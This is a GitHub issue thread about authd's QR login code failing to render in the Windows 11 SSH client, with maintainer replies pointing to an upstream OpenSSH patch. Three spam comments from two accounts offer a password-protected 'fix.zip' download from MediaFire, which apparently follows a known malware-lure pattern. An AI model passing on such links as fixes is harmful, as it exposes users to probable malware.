### ISSUE TITLE
Issue: QR code does not render in Microsoft Terminal (Windows 11)

### ISSUE THREAD

**Issue by heitbaum** [ubuntu/authd#497]
### Is there an existing issue for this?

- [X] I have searched the existing issues and found none that matched mine

### Describe the issue

The QR code displays as a series of \### numbers (not the QR code) this is using cmd, powershell. Works fine in putty.

### Where does the issue happens

- [ ] I can reproduce the issue in the graphical display manager
- [X] I can reproduce the issue on a terminal with "login"

### Steps to reproduce it

1. Open up a terminal session on windows 11
2. ssh firstname.last@msentra.domian.com@ubuntubox
3. Choose 2
4. QR code is NOT displayed

### Environment
* broker version: please run `snap info authd-msentraid` 0.1 (33)
* authd version: please run `/usr/libexec/authd version` 0.3.3
* gnome shell version: please run `apt policy gnome-shell`
* Distribution: (**NAME** in `/etc/os-release`) Ubuntu
* Distribution version: (**VERSION_ID** on `/etc/os-release`): 24.04

### Log files
Please redact/remove sensitive information:

#### Authd entries:

```raw
journalctl -u authd.service
```

####  MS Entra ID broker entries:

```raw
journalctl -u snap.authd-msentraid.authd-msentraid.service
```

### Application settings

Please redact/remove sensitive information:

####  Broker configuration:

```raw
cat /var/snap/authd-msentraid/current/broker.conf
```

####  Broker authd configuration:

```raw
cat /etc/authd/brokers.d/msentraid.conf
```

### Double check your logs

- [X] I have redacted any sensitive information from the logs

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 3v1n0** [comment]
This is using WSL or what ssh client?

The issue is handled upstream by https://github.com/openssh/openssh-portable/pull/452 and we're carrying the patches for ubuntu 24.04 and prepared a backport for 22.04 and 20.04.

For the others, we won't probably show the qr code at all, but we need to handle the case in the server, so it will take a while too.

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by heitbaum** [comment]
> This is using WSL or what ssh client?
> 
> The issue is handled upstream by [openssh/openssh-portable#452](https://github.com/openssh/openssh-portable/pull/452) and we're carrying the patches for ubuntu 24.04 and prepared a backport for 22.04 and 20.04.
> 
> For the others, we won't probably show the qr code at all, but we need to handle the case in the server, so it will take a while too.

this is the native ssh client in Windows11
```
C:\Users\MyUser>ssh -V
OpenSSH_for_Windows_8.6p1, LibreSSL 3.4.3
```

**Comment by jibel** [comment]
I confirm the issue with the SSH client of Windows 11
![image](https://github.com/user-attachments/assets/8fcdaea2-3b07-4e8b-afc3-2c6960e63f09)

For the moment, I'd recommend to use an alternative client that supports UTF-8 such as Putty
![image](https://github.com/user-attachments/assets/67b5456b-d311-4820-8a7e-7b6472ccda25)

**Comment by heitbaum** [comment]
same as #500

**Comment by bill-taut** [comment]
It would be great if the login code were provided as text so it could be simply typed into the `devicelogin` URL without having to scan the QR code. This would also be a workaround for the UTF-8 not rendering correctly (which is a problem [also on MacOS](https://github.com/ubuntu/authd/issues/500).

**Comment by jibel** [comment]
We do not have a good way to handle this at the moment because the client is not exposed to PAM by the server and many clients are affected. So we're going to not display QR code for SSH.
